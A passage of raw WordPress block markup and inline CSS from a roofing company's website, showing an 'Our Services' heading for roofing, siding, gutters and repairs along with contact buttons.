976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-246a2b65-87d8-4918-b298-987be4cda10b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6d7c2a1c-0b2d-449c-acd2-4f7427c23338\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6d7c2a1c-0b2d-449c-acd2-4f7427c23338.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"3024554d-0d81-4ed2-880a-fbe0b98e00ff\"} -->\n<style type=\"text/css\"> .block-3024554d-0d81-4ed2-880a-fbe0b98e00ff .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-3024554d-0d81-4ed2-880a-fbe0b98e00ff .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3024554d-0d81-4ed2-880a-fbe0b98e00ff .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3024554d-0d81-4ed2-880a-fbe0b98e00ff .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-3024554d-0d81-4ed2-880a-fbe0b98e00ff .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-3024554d-0d81-4ed2-880a-fbe0b98e00ff .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3024554d-0d81-4ed2-880a-fbe0b98e00ff .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-3024554d-0d81-4ed2-880a-fbe0b98e00ff skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"d5ed0e3d-c5a9-4c91-b473-a6240dab5398\"} -->\n<style type=\"text/css\"> .block-d5ed0e3d-c5a9-4c91-b473-a6240dab5398 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d5ed0e3d-c5a9-4c91-b473-a6240dab5398 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d5ed0e3d-c5a9-4c91-b473-a6240dab5398 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d5ed0e3d-c5a9-4c91-b473-a6240dab5398 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d5ed0e3d-c5a9-4c91-b473-a6240dab5398 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d5ed0e3d-c5a9-4c91-b473-a6240dab5398\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"083b9227-6f0d-4bf8-a0ec-bc464124dafa\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-083b9227-6f0d-4bf8-a0ec-bc464124dafa {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-083b9227-6f0d-4bf8-a0ec-bc464124dafa\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"37467fe0-cd2d-4869-9a8b-81cbada99f61\"} -->\n<style type=\"text/css\"> .block-37467fe0-cd2d-4869-9a8b-81cbada99f61 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-37467fe0-cd2d-4869-9a8b-81cbada99f61 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-37467fe0-cd2d-4869-9a8b-81cbada99f61 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-37467fe0-cd2d-4869-9a8b-81cbada99f61 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-37467fe0-cd2d-4869-9a8b-81cbada99f61 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-37467fe0-cd2d-4869-9a8b-81cbada99f61\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"cef0c200-85ef-4ac6-9286-d53d6f3da8cc\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-cef0c200-85ef-4ac6-9286-d53d6f3da8cc skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b8cd12ae-2bbb-47e7-b48e-ae6bb1e6b46c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"9c5c1084-4387-49fa-aa10-e911b5c59147\"} -->\n<style type=\"text/css\"> .block-9c5c1084-4387-49fa-aa10-e911b5c59147 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-9c5c1084-4387-49fa-aa10-e911b5c59147 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9c5c1084-4387-49fa-aa10-e911b5c59147 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9c5c1084-4387-49fa-aa10-e911b5c59147 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-9c5c1084-4387-49fa-aa10-e911b5c59147 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-9c5c1084-4387-49fa-aa10-e911b5c59147 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9c5c1084-4387-49fa-aa10-e911b5c59147 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-9c5c1084-4387-49fa-aa10-e911b5c59147 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"1ffec91c-571f-4f8d-8a96-dfaaa2396c35\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-1ffec91c-571f-4f8d-8a96-dfaaa2396c35 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1ffec91c-571f-4f8d-8a96-dfaaa2396c35 